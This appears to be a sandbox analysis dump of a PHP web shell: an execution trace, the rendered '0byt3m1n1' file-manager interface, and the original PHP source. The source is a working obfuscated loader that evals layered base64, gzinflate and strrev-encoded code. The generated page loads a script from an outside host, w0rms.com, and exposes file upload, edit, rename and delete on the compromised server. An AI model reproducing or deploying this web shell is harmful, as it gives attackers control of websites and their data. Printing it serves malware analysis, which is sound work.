4 70 0 0.004476 465664 date 0 /var/www/html/uploads/20.php(5) : eval()'d code(1) : eval()'d code 71 2 'd-M-Y H:i' 1676251645
4 70 1 0.004507 465992
4 70 R '12-Feb-2023 20:27'
3 15 1 0.004529 465776
2 7 1 0.004541 424680
1 A /var/www/html/uploads/20.php 6 $encodephp = ''
2 71 0 0.004559 422224 base64_decode 0 /var/www/html/uploads/20.php 7 1 ''
2 71 1 0.004572 422288
2 71 R ''
0.004601 340680
TRACE END [2023-02-12 23:27:51.032309]
Generated HTML code
<html><head><script src="http://w0rms.com/kaydet.php"></script><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<style type="text/css">body{background: #263238;color:#eceff1;font-family:'Courier';margin:0;font-size: 14px;}h1{font-family:'VT323';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:'Courier'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>
</head><body> <div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;">
<input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first">
<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>
<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/20.php&path=/var/www/html">20.php</a></td><td><center>3.562 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 20:27</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="20.php"><input type="hidden" name="path" value="/var/www/html/20.php"><input type="submit" value="+"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 20:27</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value="+"></form></center></td></tr></tbody></table></div><br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br></body></html>Original PHP code
<?php
//w0rms.com shell secure
$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$r57txt = "==AZruAWY3qfKIg/wlrJFMvevml4PR8+IzinC8Umx/CM/6wbl7yH3acv8+Q+UvJ6eBbQ0n84Hwvb/HUa8fLSvqPsyMC5PM8PDnDCPTuBcGZBjlsYnNTGVhcuMfnYAR3Dxs5+YCN4WzMY6V3se4xnxMe6znhv1NrGf4+YDN4DuFM3ni8u/BvOB1r9km8ucBffgV6TFc0uBvSnoFi2zMqZhApbMEkfoqvsb56zbR9xSgd+z/oy1cyQ+15S0nudxDN0nJ1g60F/0ZDnqr1cl29Mhy65SNbnu4enNcuOXyZ62lI0bzn6bxn6uR2fDJTNQJhDw06VfgMu4pjsLvR/WPyPPtldQeKAOnq4p57STN5WDklFYtMGPKiy+P1YU/UyVjDuR3fdHrhcM+vqty5ZtlyB400v7i5NJ/1BuJ6dRGOyp5yT/X8puRlUc5oNJKFbX2gf8STln02CeQtoE1XjPSGer1+Za2e3fuW7ccKtfos2c45xYRkrL3C9v0YXinvK6FnRXvPzD//Jug0On71nQWKODcRjlSwWWZnSJErxq12jiE3e8ZrqXTOxsyfl4UjvNTiN8wwGDTDem+wCoRbqdLp86L6lGjo0z2rVwYztm79V73Rlt2ndkmv9Fd2eUdtXRTl6SJ7oi2RaQ9a5V433Evq0Q7JHwwD0b+hemk52QV0U5oE+fKpZpQd57UiTJ9uocaM2VLDHQh5X6JJVcwwNEU8+RNffYFOKHlVW4jIqLogIegD0mYM3JGrdW3yKAfIscDJ/9OeDx9IwwSHj2GOD/wXj9Tt/vTt2qEC651D09ns9qy1A4iJXIVvrsuMUmWk83gHkaeAgPZhrTcbQmxzAsf4beIqYIszixRh5O2HQdt1tFh1oVnPIv/A+6Qo8S75dVlgjXRh3f1Fx/Qjd8KrXwEKWhEtnXXfGrjXkUea+8fIanNBDZBlWFvLMTCtR/COYe9zzlUv6MyonfFWpbCC+R91oj7tswZ6vgkpu/oyKvoyFdBirsaOAZDwLM+YyVo1S3pOgfOp1Wg3BOTew4mhwdJnvZGBAeJWxIPawwJ6TMMrcvABa+8F99DYXUSDe6PhoxTvHuRd9CcVgKhB3zHC+AI8bYhxb0z7W+TqOXjXaX37z4WBd4uU/J4gKN1mugsyqbW6bYscc6xxDmYtVvYW9uG6HmIYHUCOEzRUvzWqLONkL2CJP5vOXdIU+n9cICYeAKCvVlpT7yc4suucbJuNGtGVrnwSGOTLQ36/6IM83/bMqnrCjzFoBq15YOgI2aBLR6ilHMv7kC3yzxeOcmJ5lPmd3GzkkLC86Lq0cP0WaRNkHOqRzix+SgIIibBdwPUPNfh0KAXwDdEsqEcmR3lBANVMlS6QCKEkWaIZoOgdo5jog36fRdKMp7OP+3gIbFWFU8StL6aN4evyzR/GTEb4cL6j+e0GS1kFInta6vIpqIoixY+BKNgXExre9pFJFJqJJ1Q/ZkfnZ+lcncJvUoTVBNmm7WpgtI96YfDo0b7lAPt23wZ5vHPF43y9ItIy/4CR8N9LQV3xVEOfzwUbBdltiSepH4ZghHKz5YZz61MRxg1beof2tYrap5gQC8Rpt3SKqMXxBhBv2baw4BFMr9FhnPTC04cDFTqgZx6lTTzjy2PNOoQPPWmtuII5DWc0iyRXbnd5c5tRo5RpsU4hHQHuhNzeMnses7JgF5vmIT/mHqLGXw2gcuLK81qojUaESNTNmjdzU7lU3kD50A/OFFFb2/uH5wXmD1Px0nRi0oEb6d0vs+Ca2BXOweZF22uQ4008FSU7t/BRIz1LLvw84YZfr3JkQFL8Eyh5VjQxVk+Pe85piOK6yCowyTletLPJOTa88+TnlQKJlG6djw8cbC3oxBE3bIFbDueON+IpXTK5vhlADN46n3ec47/L0NBqNWAAqDAuJlaZZUa8rFxYsdGTK1bMQrofb8LZJNsrCyl9UVRB2auYSNsHrgu/zU0F2SyoRQs1cCdpTw0oBGXkN47pYgJrUh3V9ejDmLpNEJmhYVH3TiJ8C4GEtB67rH4adSY2kQ+BIcEQdlwI3KCVwkt/5Q1V+Ugbg14c52IfLc0BdYzPohPb1vyehm8nCFLyeQoSVbI8tdx3p3wj/8xXQjyGZTJQN1ilQ3y2GbVHQ46caMtbutWq8TwojY/pQoGJYpGVBUIEhGiBh8FOtA+574S5btYDCHvEt9iFfgI5GbRgI+0dNlQ1T0UpczEyi4EFuUq1maUlEGq/y9Zq3WXkWU4uEGuwJimDgQwnS0sfsIkxfJnR25sQ61UA9m40mYVPyFSGXoFj8P6oJb43d79KQqalMLmQreAh3Dd/NRmYtxB9jFqKy0lOucXcdjs2qb3999zQfGEWmQLc2xIYbwsfAeAbBeNTdDitz77M7CUhCJVx0q26htajURuA89zoatIoUsPWIAL0KCbaEQARIbFUnSYPce7DvsTOwgta2rI1kqCyI2UskhMhTuT9kYNDyBtXwsg5BOw8Bf31S6xZGkiP5HR89nyuPz4+ENhRsirQWG7+CcTlvlA+9VMHahV2/PgpvF2dWotAqju1CtPLEEEjJR0lwed210xVaqv2m1S+IWll5wl1TMrWimLix1N65XGLgCiU6fhxXnwZMwkUhaWQmqr4ow57EMGzcntQHcTJuomqq/yb9jevpfmeIw+XhdWTLPgRWyHOaGPeIkLbTjP0Hq0u+R0PBWwjy85jEJ+yInPxA4oTeh0Pjyi3z+UP1VfI/N9DcdznmQXjeRtq0YwZG647/Y3DGFxNC5itGKFqpmLCzSmVvkhlkKkpBUxEDGSJfAo2mfwtfLeCE9VjjiJChY58os0LM9itKsp8QErUCHCmYhIuZbKizSQJ2WMXmzgvwOOjv5eZ/jlTEiZ+S813vXdzhlnM+RHvzXc0xX3aGWarsOzG3L2D4TQC2GCfcvacpnlVLbs46OhdPZWPpmJ+KnOc87X3u517c4gkKO3p21zS7ZDWiX+929uwOFm9A9A6wGYKeC7yELlzbCnnxxEY12qYEwNqbBDniczUZf0BGHHkKsdWBDE9Mgv/szvQJnz6ii788N5QkL45zxJpCYi384YcI84tY+ojP9wT6XYMoBMvvzZ45C00is7D7aHbdeBgD79d9VtNFgIbRJQMoRO0xWq7Z3pBZbn02JR80STyrcYnSElINhiqgD8Pj37nF2s9cblV1cin9mmQWBwJe2vZCkFg9WmQaBYfkJ4WA";
eval(htmlspecialchars_decode(urldecode(base64_decode($encoder57txt))));
$encodephp="";
base64_decode($encodephp);
exit;
?>